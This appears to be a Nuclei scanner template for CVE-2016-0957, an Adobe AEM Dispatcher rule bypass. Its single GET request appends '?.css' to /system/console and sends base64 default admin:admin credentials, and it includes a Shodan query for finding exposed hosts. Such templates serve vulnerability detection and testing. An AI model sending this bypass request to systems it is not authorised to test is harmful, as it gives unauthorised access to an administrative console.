50 lines
1.6 KiB
YAML
50 lines
1.6 KiB
YAML
id: CVE-2016-0957
|
|
|
|
info:
|
|
name: Adobe AEM Dispatcher <4.15 - Rules Bypass
|
|
author: geeknik
|
|
severity: high
|
|
description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
|
|
remediation: |
|
|
Upgrade to Adobe AEM Dispatcher version 4.15 or higher to fix the vulnerability.
|
|
reference:
|
|
- https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
|
|
- https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-0957
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2016-0957
|
|
epss-score: 0.06304
|
|
epss-percentile: 0.92845
|
|
cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: adobe
|
|
product: dispatcher
|
|
shodan-query: http.component:"Adobe Experience Manager"
|
|
tags: cve,cve2016,adobe,aem
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/system/console?.css"
|
|
|
|
headers:
|
|
Authorization: "Basic YWRtaW46YWRtaW4K"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "Adobe"
|
|
- "java.lang"
|
|
- "(Runtime)"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a0047304502201792a6180653c7c0319c2ce1aa32f6309b31fc5b0095db65c7c2c3309c5c1524022100917b317ac02dfed716e0608bb270337efc4bf2d12d97a8ed534c74ebf8229169:922c64590222798bb761d5b6d8e72950
|